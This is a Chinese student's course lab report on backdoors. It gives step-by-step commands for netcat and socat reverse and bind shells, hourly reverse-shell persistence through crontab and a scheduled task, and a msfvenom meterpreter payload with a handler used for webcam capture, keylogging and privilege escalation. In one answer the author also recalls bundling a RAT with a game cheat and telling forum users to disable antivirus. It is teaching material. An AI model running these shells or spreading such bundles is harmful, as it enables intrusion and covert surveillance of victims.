20154313 刘文亨 EXP2

20154313 Exp2 后门原理与实践 

目录

· 实践内容

· 实践过程

· netcat

· socat

· msf-meterpreter

· 基础问题回答

· 实验心得与体会

 

正文

回到顶部

实践内容

· 

使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。

· 

· 

详情见实验指导书

· 

回到顶部

实践过程

netcat

netcat获取主机操作Shell,cron启动

windows获得linux的shell

· windows平台下利用cmd的ipconfig命令查看到本机的ip地址为192.168.1.226

· 

 

· 

kali在终端下使用ifconfig命令查看kali的IP地址为192.168.1.176

 

 

· 

· 

windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。

· 

 

· 

kali下使用为nc 192.168.1.226(即主机ip) 4313 -e /bin/sh命令连接windows的4313端口。

· 

· 

连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:

 

 

· 

linux获得windows的shell

· kali下使用nc -l -p 4313命令监听4313端口。

 

· windows下使用ncat.exe -e cmd.exe 192.168.1.176(即kali的IP地址)连接kali的4313端口。

· 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。

 

使用netcat传输数据

· 

windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。

 

 

· 

· kali下使用为nc 192.168.1.226(即主机ip) 4313命令连接windows的4313端口。

· 

 

建立连接后,尝试传输。

 

 

 

· 

cron启动

· 

windows下使用ncat.exe -l -p 4313命令运行ncat.exe监听4313端口。

 

 

· 

· kali下使用crontab -e命令,设置一条定时指令,因为现在是22:40,所以我设置成在每小时的第42分钟反向连接windows主机的4313端口。

· 42 * * * * /bin/netcat 172.30.6.204 4313 -e /bin/sh

· 

 

42分时连接成功,成功获得linux的shell,输入ls指令查看。(这里由于我使用的是中文版,所以桌面、文档、下载等均无法正常显示)

 

 

· 

socat

socat获取主机操作Shell, 任务计划启动。

· windows下在控制面板->管理工具->任务计划程序中新建一个触发器。

 

 

 

 

· 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4327 exec:cmd.exe,pty,stderr 

· 待重启后,刷新任务,可看到任务已经开始执行。

 

· kali下使用socat - tcp:172.30.6.204(即主机ip):4313(端口),此时已成功获取windows的shell。

 

 

msf-meterpreter

msf-meterpreter 生成后门,传输到靶机获取shell

· kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=4313 -f exe > 20154313.exe 生成一个名为20154313的后门程序

 

· 使用netcat将这个后门程序传输到windows主机上。

首先我们在windows下输入ncat.exe -lv 4313> 20154313.exe

随后在Linux下使用ncat -nv 172.30.6.204 4327 < 20154313exe命令把文件传送过去

· 这里在杀毒软件上设置20154313.exe为信任程序,后运行

 

使用msf获取目标摄像头,进行录屏、键盘记录等操作

· 首先msf打开监听进程

· msfconsole //进入msf

· use exploit/multi/handler //进入handler模式

· set payload windows/meterpreter/reverse_tcp //设置payload

· set LHOST 172.30.1.193 //将LHOST设置为LinuxIP地址

· set LPORT 4327 //设端口为那个4327

· exploit //MSF开始监听

 

 

 

 

查看系统信息、获取键盘输入、截获摄像头

· 摄像头:

 

· 提权:

回到顶部

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:以前尝试过,将生成好的灰鸽子文件和cf游戏外挂捆绑在一起,然后上传到游戏论坛上,并注明,因为有注入,所以会被误报,关闭杀软运行,等待肉鸡上线。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:如上例所说的捆绑方式,还有将自己设为开机启动,在开机后自动运行,以及伪装文件,将自己伪装成常用软件,等待用户点击。

(3)Meterpreter有哪些给你映像深刻的功能?

答:打开摄像头录拍,平时家里电脑放在桌子上,都是正对着床,以后还是用卫生纸挡住。

(4)如何发现自己有系统有没有被安装后门?

答:查看当前电脑的开机项,检测是否有未知项,查看电脑是否存在异常,例如莫名其妙出现的“全家桶”、cpu硬盘等占用异常。

回到顶部

实验心得与体会

这次实验比较简单比较有趣,让我懂得了后门以及木马,学会了使用工具来获得权限,了解了监控摄像头以及记录键盘等恶意行为的使用。

· 

 

posted @ 2018-04-05 16:22  20154313_刘文亨  阅读(108)  评论(0编辑  收藏